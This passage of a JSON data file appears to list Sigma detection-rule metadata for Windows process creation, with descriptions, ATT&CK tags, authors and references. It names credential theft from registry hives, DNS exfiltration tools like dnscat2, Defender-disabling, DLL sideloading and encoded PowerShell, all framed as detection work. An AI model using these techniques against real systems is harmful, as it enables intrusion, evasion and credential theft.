"attack.credential_access", - "attack.t1556.002" - ], - "creation_date": "2020/10/29", - "filename": "proc_creation_win_credential_access_via_password_filter.yml", - "author": "Sreeman", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects Credential Acquisition via Registry Hive Dumping", - "uuid": "4d6c9da1-318b-4edf-bcea-b6c93fa98fd0", - "value": "Credential Acquisition via Registry Hive Dumping", - "meta": { - "refs": [ - "https://www.elastic.co/guide/en/security/current/credential-acquisition-via-registry-hive-dumping.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_credential_acquisition_registry_hive_dumping.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003" - ], - "creation_date": "2022/10/04", - "filename": "proc_creation_win_credential_acquisition_registry_hive_dumping.yml", - "author": "Tim Rauch", - "level": "high", - "falsepositive": "No established falsepositives", - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects Archer malware invocation via rundll32", - "uuid": "3d4aebe0-6d29-45b2-a8a4-3dfde586a26d", - "value": "Fireball Archer Install", - "meta": { - "refs": [ - "https://www.virustotal.com/en/file/9b4971349ae85aa09c0a69852ed3e626c954954a3927b3d1b6646f139b930022/analysis/", - "https://www.hybrid-analysis.com/sample/9b4971349ae85aa09c0a69852ed3e626c954954a3927b3d1b6646f139b930022?environmentId=100", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_crime_fireball.yml" - ], - "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1218.011" - ], - "creation_date": "2017/06/03", - "filename": "proc_creation_win_crime_fireball.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects specific process characteristics of Maze ransomware word document droppers", - "uuid": "29fd07fc-9cfd-4331-b7fd-cc18dfa21052", - "value": "Maze Ransomware", - "meta": { - "refs": [ - "https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html", - "https://app.any.run/tasks/51e7185c-52d7-4efb-ac0d-e86340053473/", - "https://app.any.run/tasks/65a79440-373a-4725-8d74-77db9f2abda4/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_crime_maze_ransomware.yml" - ], - "tags": [ - "attack.execution", - "attack.t1204.002", - "attack.t1047", - "attack.impact", - "attack.t1490" - ], - "creation_date": "2020/05/08", - "filename": "proc_creation_win_crime_maze_ransomware.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects specific process characteristics of Snatch ransomware word document droppers", - "uuid": "5325945e-f1f0-406e-97b8-65104d393fff", - "value": "Snatch Ransomware", - "meta": { - "refs": [ - "https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_crime_snatch_ransomware.yml" - ], - "tags": [ - "attack.execution", - "attack.t1204" - ], - "creation_date": "2020/08/26", - "filename": "proc_creation_win_crime_snatch_ransomware.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Scripts that shutdown the system immediately and reboot them in safe mode are unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects command line parameters or strings often used by crypto miners", - "uuid": "66c3b204-9f88-4d0a-a7f7-8a57d521ca55", - "value": "Windows Crypto Mining Indicators", - "meta": { - "refs": [ - "https://www.poolwatch.io/coin/monero", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_crypto_mining_monero.yml" - ], - "tags": [ - "attack.impact", - "attack.t1496" - ], - "creation_date": "2021/10/26", - "filename": "proc_creation_win_crypto_mining_monero.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Legitimate use of crypto miners", - "Some build frameworks" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a curl process start on Windows, which indicates a file download from a remote location or a simple web request to a remote server", - "uuid": "bbeaed61-1990-4773-bf57-b81dbad7db2d", - "value": "Curl Usage on Windows", - "meta": { - "refs": [ - "https://web.archive.org/web/20200128160046/https://twitter.com/reegun21/status/1222093798009790464", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_curl_download.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1105" - ], - "creation_date": "2022/07/05", - "filename": "proc_creation_win_curl_download.yml", - "author": "Florian Roth", - "level": "low", - "falsepositive": [ - "Scripts created by developers and admins", - "Administrative activity" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects possible successful exploitation for vulnerability described in CVE-2021-26857 by looking for | abnormal subprocesses spawning by Exchange Server's Unified Messaging service", - "uuid": "cd479ccc-d8f0-4c66-ba7d-e06286f3f887", - "value": "CVE-2021-26857 Exchange Exploitation", - "meta": { - "refs": [ - "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cve_2021_26857_msexchange.yml" - ], - "tags": [ - "attack.t1203", - "attack.execution", - "cve.2021.26857" - ], - "creation_date": "2021/03/03", - "filename": "proc_creation_win_cve_2021_26857_msexchange.yml", - "author": "Bhabesh Raj", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.", - "uuid": "6f3e2987-db24-4c78-a860-b4f4095a7095", - "value": "Data Compressed - rar.exe", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md", - "https://eqllib.readthedocs.io/en/latest/analytics/1ec33c93-3d0b-4a28-8014-dbdaae5c60ae.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_data_compressed_with_rar.yml" - ], - "tags": [ - "attack.collection", - "attack.t1560.001" - ], - "creation_date": "2019/10/21", - "filename": "proc_creation_win_data_compressed_with_rar.yml", - "author": "Timur Zinniatullin, E.M. Anhaus, oscd.community", - "level": "low", - "falsepositive": [ - "Highly likely if rar is a default archiver in the monitored environment." - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Deletes the Windows systemstatebackup using wbadmin.exe.\nThis technique is used by numerous ransomware families.\nThis may only be successful on server platforms that have Windows Backup enabled.\n", - "uuid": "89f75308-5b1b-4390-b2d8-d6b2340efaf8", - "value": "Wbadmin Delete Systemstatebackup", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_delete_systemstatebackup.yml" - ], - "tags": [ - "attack.impact", - "attack.t1490" - ], - "creation_date": "2021/12/13", - "filename": "proc_creation_win_delete_systemstatebackup.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "HxTsr.exe is a Microsoft compressed executable file called Microsoft Outlook Communications.HxTsr.exe is part of Outlook apps, because it resides in a hidden \"WindowsApps\" subfolder of \"C:\\Program Files\". Its path includes a version number, e.g., \"C:\\Program Files\\WindowsApps\\microsoft.windowscommunicationsapps_17.7466.41167.0_x64__8wekyb3d8bbwe\\HxTsr.exe\". Any instances of hxtsr.exe not in this folder may be malware camouflaging itself as HxTsr.exe", - "uuid": "4e762605-34a8-406d-b72e-c1a089313320", - "value": "Detecting Fake Instances Of Hxtsr.exe", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_detecting_fake_instances_of_hxtsr.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036" - ], - "creation_date": "2020/04/17", - "filename": "proc_creation_win_detecting_fake_instances_of_hxtsr.yml", - "author": "Sreeman", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of the PhoneDeepLink parameter to potentially sideload a DLL file that doesnt exist. This non-existent DLL file is named \"ShellChromeAPI.dll\". \nAdversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter\n", - "uuid": "e173ad47-4388-4012-ae62-bd13f71c18a8", - "value": "DLL Sideloading via DeviceEnroller.exe", - "meta": { - "refs": [ - "https://mobile.twitter.com/0gtweet/status/1564131230941122561", - "https://strontic.github.io/xcyclopedia/library/DeviceEnroller.exe-24BEF0D6B0ECED36BB41831759FDE18D.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_deviceenroller_evasion.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1574.002" - ], - "creation_date": "2022/08/29", - "filename": "proc_creation_win_deviceenroller_evasion.yml", - "author": "@gott_cyber", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of the Dinject PowerShell cradle based on the specific flags", - "uuid": "d78b5d61-187d-44b6-bf02-93486a80de5a", - "value": "DInject PowerShell Cradle CommandLine Flags", - "meta": { - "refs": [ - "https://github.com/snovvcrash/DInjector", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dinjector.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1055" - ], - "creation_date": "2021/12/07", - "filename": "proc_creation_win_dinjector.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detect use of DirLister.exe", - "uuid": "b4dc61f5-6cce-468e-a608-b48b469feaa2", - "value": "Launch DirLister Executable", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1083/T1083.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dirlister.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1083" - ], - "creation_date": "2022/08/20", - "filename": "proc_creation_win_dirlister.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Legitimate use" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects attackers attempting to disable Windows Defender using Powershell", - "uuid": "a7ee1722-c3c5-aeff-3212-c777e4733217", - "value": "Disable Windows Defender AV Security Monitoring", - "meta": { - "refs": [ - "https://research.nccgroup.com/2020/06/23/wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group/", - "https://rvsec0n.wordpress.com/2020/01/24/malwares-that-bypass-windows-defender/", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_disable_defender_av_security_monitoring.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "creation_date": "2020/10/12", - "filename": "proc_creation_win_disable_defender_av_security_monitoring.yml", - "author": "ok @securonix invrep-de, oscd.community, frack113", - "level": "high", - "falsepositive": [ - "Minimal, for some older versions of dev tools, such as pycharm, developers were known to sometimes disable Windows Defender to improve performance, but this generally is not considered a good security practice." - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects when attackers use \"sc.exe\" or the powershell \"Set-Service\" cmdlet to change the startup type of a service to \"disabled\"", - "uuid": "85c312b7-f44d-4a51-a024-d671c40b49fc", - "value": "Sc Or Set-Service Cmdlet Execution to Disable Services", - "meta": { - "refs": [ - "https://www.virustotal.com/gui/file/38283b775552da8981452941ea74191aa0d203edd3f61fb2dee7b0aea3514955", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_disable_service.yml" - ], - "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1562.001" - ], - "creation_date": "2022/08/01", - "filename": "proc_creation_win_disable_service.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Administrators settings a service to disable via script or cli for testing purposes" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may search for private key certificate files on compromised systems for insecurely stored credential", - "uuid": "213d6a77-3d55-4ce8-ba74-fcfef741974e", - "value": "Discover Private Keys", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.004/T1552.004.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_discover_private_keys.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1552.004" - ], - "creation_date": "2021/07/20", - "filename": "proc_creation_win_discover_private_keys.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects execution of Microsoft Defender's CLI process (MpCmdRun.exe) from the non-default directory which may be an attempt to sideload arbitrary DLL", - "uuid": "7002aa10-b8d4-47ae-b5ba-51ab07e228b9", - "value": "DLL Sideloading by Microsoft Defender", - "meta": { - "refs": [ - "https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dll_sideload_defender.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1574.002" - ], - "creation_date": "2022/08/01", - "filename": "proc_creation_win_dll_sideload_defender.yml", - "author": "Bhabesh Raj", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects execution of VMware Xfer utility (VMwareXferlogs.exe) from the non-default directory which may be an attempt to sideload arbitrary DLL", - "uuid": "ebea773c-a8f1-42ad-a856-00cb221966e8", - "value": "DLL Sideloading by VMware Xfer Utility", - "meta": { - "refs": [ - "https://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dll_sideload_vmware_xfer.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1574.002" - ], - "creation_date": "2022/08/02", - "filename": "proc_creation_win_dll_sideload_vmware_xfer.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "The PowerShell implementation of DNSCat2 calls nslookup to craft queries. Counting nslookup processes spawned by PowerShell will show hundreds or thousands of instances if PS DNSCat2 is active locally.", - "uuid": "b11d75d6-d7c1-11ea-87d0-0242ac130003", - "value": "DNSCat2 Powershell Implementation Detection Via Process Creation", - "meta": { - "refs": [ - "https://github.com/lukebaggett/dnscat2-powershell", - "https://blu3-team.blogspot.com/2019/08/powershell-dns-c2-notes.html", - "https://ragged-lab.blogspot.com/2020/06/it-is-always-dns-powershell-edition.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dnscat2_powershell_implementation.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1071", - "attack.t1071.004", - "attack.t1001.003", - "attack.t1041" - ], - "creation_date": "2020/08/08", - "filename": "proc_creation_win_dnscat2_powershell_implementation.yml", - "author": "Cian Heasley", - "level": "high", - "falsepositive": [ - "Other powershell scripts that call nslookup.exe" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects an attempt to add a potentially crafted DLL as a plug in of the DNS Service.\nDetects an attempt to leverage dnscmd.exe to enumerate the DNS zones of a domain.\nDNS zones used to host the DNS records for a particular domain\n", - "uuid": "b6457d63-d2a2-4e29-859d-4e7affc153d1", - "value": "Discovery/Execution via dnscmd.exe", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/dnscmd", - "https://docs.microsoft.com/en-us/azure/dns/dns-zones-records", - "https://lolbas-project.github.io/lolbas/Binaries/Dnscmd/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dnscmd_discovery.yml" - ], - "tags": [ - "attack.discovery", - "attack.execution", - "attack.t1543.003" - ], - "creation_date": "2022/07/31", - "filename": "proc_creation_win_dnscmd_discovery.yml", - "author": "@gott_cyber", - "level": "medium", - "falsepositive": [ - "Legitimate administration use" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Well-known DNS Exfiltration tools execution", - "uuid": "98a96a5a-64a0-4c42-92c5-489da3866cb0", - "value": "DNS Exfiltration and Tunneling Tools Execution", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dns_exfiltration_tools_execution.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1048.001", - "attack.command_and_control", - "attack.t1071.004", - "attack.t1132.001" - ], - "creation_date": "2019/10/24", - "filename": "proc_creation_win_dns_exfiltration_tools_execution.yml", - "author": "Daniil Yugoslavskiy, oscd.community", - "level": "high", - "falsepositive": [ - "Legitimate usage of iodine or dnscat2 \u2014 DNS Exfiltration tools (unlikely)" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the installation of a plugin DLL via ServerLevelPluginDll parameter in Registry, which can be used to execute code in context of the DNS server (restart required)", - "uuid": "f63b56ee-3f79-4b8a-97fb-5c48007e8573", - "value": "DNS ServerLevelPluginDll Install", - "meta": { - "refs": [ - "https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dns_serverlevelplugindll.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1574.002", - "attack.t1112" - ], - "creation_date": "2017/05/08", - "filename": "proc_creation_win_dns_serverlevelplugindll.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "dotnet.exe will execute any DLL and execute unsigned code", - "uuid": "d80d5c81-04ba-45b4-84e4-92eba40e0ad3", - "value": "Dotnet.exe Exec Dll and Execute Unsigned Code LOLBIN", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dotnet/", - "https://twitter.com/_felamos/status/1204705548668555264", - "https://bohops.com/2019/08/19/dotnet-core-a-vector-for-awl-bypass-defense-evasion/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dotnet.yml" - ], - "tags": [ - "attack.execution", - "attack.t1218" - ], - "creation_date": "2020/10/18", - "filename": "proc_creation_win_dotnet.yml", - "author": "Beyu Denis, oscd.community", - "level": "medium", - "falsepositive": [ - "System administrator Usage" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects usage of Dsacls to grant over permissive permissions", - "uuid": "01c42d3c-242d-4655-85b2-34f1739632f7", - "value": "Abusing Permissions Using Dsacls", - "meta": { - "refs": [ - "https://ss64.com/nt/dsacls.html", - "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc771151(v=ws.11)", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dsacls_abuse_permissions.yml" - ], - "tags": [ - "attack.execution", - "attack.t1218" - ], - "creation_date": "2022/06/20", - "filename": "proc_creation_win_dsacls_abuse_permissions.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Legitimate administrators granting over permissive permissions to users" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects possible password spraying attempts using Dsacls", - "uuid": "bac9fb54-2da7-44e9-988f-11e9a5edbc0c", - "value": "Password Spraying Attempts Using Dsacls", - "meta": { - "refs": [ - "https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/using-dsacls-to-check-ad-object-permissions#password-spraying-anyone", - "https://ss64.com/nt/dsacls.html", - "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc771151(v=ws.11)", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dsacls_password_spray.yml" - ], - "tags": [ - "attack.execution", - "attack.t1218" - ], - "creation_date": "2022/06/20", - "filename": "proc_creation_win_dsacls_password_spray.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Legitimate use of dsacls to bind to an LDAP session" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Deployment Image Servicing and Management tool. DISM is used to enumerate, install, uninstall, configure, and update features and packages in Windows images", - "uuid": "43e32da2-fdd0-4156-90de-50dfd62636f9", - "value": "Dism Remove Online Package", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md#atomic-test-26---disable-windows-defender-with-dism", - "https://www.trendmicro.com/en_us/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dsim_remove.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "creation_date": "2022/01/16", - "filename": "proc_creation_win_dsim_remove.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Legitimate script" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of the filename DumpStack.log to evade Microsoft Defender", - "uuid": "4f647cfa-b598-4e12-ad69-c68dd16caef8", - "value": "DumpStack.log Defender Evasion", - "meta": { - "refs": [ - "https://twitter.com/mrd0x/status/1479094189048713219", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dumpstack_log_evasion.yml" - ], - "tags": [ - "attack.defense_evasion" - ], - "creation_date": "2022/01/06", - "filename": "proc_creation_win_dumpstack_log_evasion.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects email exfiltration via powershell cmdlets", - "uuid": "312d0384-401c-4b8b-abdf-685ffba9a332", - "value": "Email Exifiltration Via Powershell", - "meta": { - "refs": [ - "https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/", - "https://github.com/Azure/Azure-Sentinel/blob/7e6aa438e254d468feec061618a7877aa528ee9f/Hunting%20Queries/Microsoft%20365%20Defender/Ransomware/DEV-0270/Email%20data%20exfiltration%20via%20PowerShell.yaml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_email_exfil_via_powershell.yml" - ], - "tags": [ - "attack.exfiltration" - ], - "creation_date": "2022/09/09", - "filename": "proc_creation_win_email_exfil_via_powershell.yml", - "author": "Nasreddine Bencherchali (rule), Azure-Sentinel (idea)", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects events that appear when a user click on a link file with a powershell command in it", - "uuid": "30e92f50-bb5a-4884-98b5-d20aa80f3d7a", - "value": "Hidden Powershell in Link File Pattern", - "meta": { - "refs": [ - "https://www.x86matthew.com/view_post?id=embed_exe_lnk", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_embed_exe_lnk.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2022/02/06", - "filename": "proc_creation_win_embed_exe_lnk.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Legitimate commands in .lnk files" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a base64 encoded FromBase64String keyword in a process command line", - "uuid": "fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c", - "value": "Encoded FromBase64String", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_encoded_frombase64string.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1140", - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2019/08/24", - "filename": "proc_creation_win_encoded_frombase64string.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a base64 encoded IEX command string in a process command line", - "uuid": "88f680b8-070e-402c-ae11-d2914f2257f1", - "value": "Encoded IEX", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_encoded_iex.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2019/08/23", - "filename": "proc_creation_win_encoded_iex.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects processes that query known 3rd party registry keys that holds credentials via commandline", - "uuid": "87a476dc-0079-4583-a985-dee7a20a03de", - "value": "Enumeration for 3rd Party Creds From CLI", - "meta": { - "refs": [ - "https://isc.sans.edu/diary/More+Data+Exfiltration/25698", - "https://github.com/synacktiv/Radmin3-Password-Cracker/blob/acfc87393e4b7c06353973a14a6c7126a51f36ac/regkey.txt", - "https://github.com/HyperSine/how-does-MobaXterm-encrypt-password", - "https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#inside-the-registry", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_enumeration_for_credentials_cli.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1552.002" - ], - "creation_date": "2022/06/20", - "filename": "proc_creation_win_enumeration_for_credentials_cli.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may search the Registry on compromised systems for insecurely stored credentials.\nThe Windows Registry stores configuration information that can be used by the system or other programs.\nAdversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services\n", - "uuid": "e0b0c2ab-3d52-46d9-8cb7-049dc775fbd1", - "value": "Enumeration for Credentials in Registry", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.002/T1552.002.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_enumeration_for_credentials_in_registry.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1552.002" - ], - "creation_date": "2021/12/20", - "filename": "proc_creation_win_enumeration_for_credentials_in_registry.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "One way Qbot steals sensitive information is by extracting browser data from Internet Explorer and Microsoft Edge by using the built-in utility esentutl.exe", - "uuid": "6a69f62d-ce75-4b57-8dce-6351eb55b362", - "value": "Esentutl Steals Browser Information", - "meta": { - "refs": [ - "https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/", - "https://redcanary.com/threat-detection-report/threats/qbot/", - "https://thedfirreport.com/2022/10/31/follina-exploit-leads-to-domain-compromise/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_esentutl_webcache.yml" - ], - "tags": [ - "attack.collection", - "attack.t1005" - ], - "creation_date": "2022/02/13", - "filename": "proc_creation_win_esentutl_webcache.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Legitimate use" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Potential adversaries stopping ETW providers recording loaded .NET assemblies.", - "uuid": "41421f44-58f9-455d-838a-c398859841d4", - "value": "COMPlus_ETWEnabled Command Line Arguments", - "meta": { - "refs": [ - "https://twitter.com/_xpn_/status/1268712093928378368", - "https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr", - "https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables", - "https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38", - "https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39", - "https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_", - "https://bunnyinside.com/?term=f71e8cb9c76a", - "http://managed670.rssing.com/chan-5590147/all_p1.html", - "https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code", - 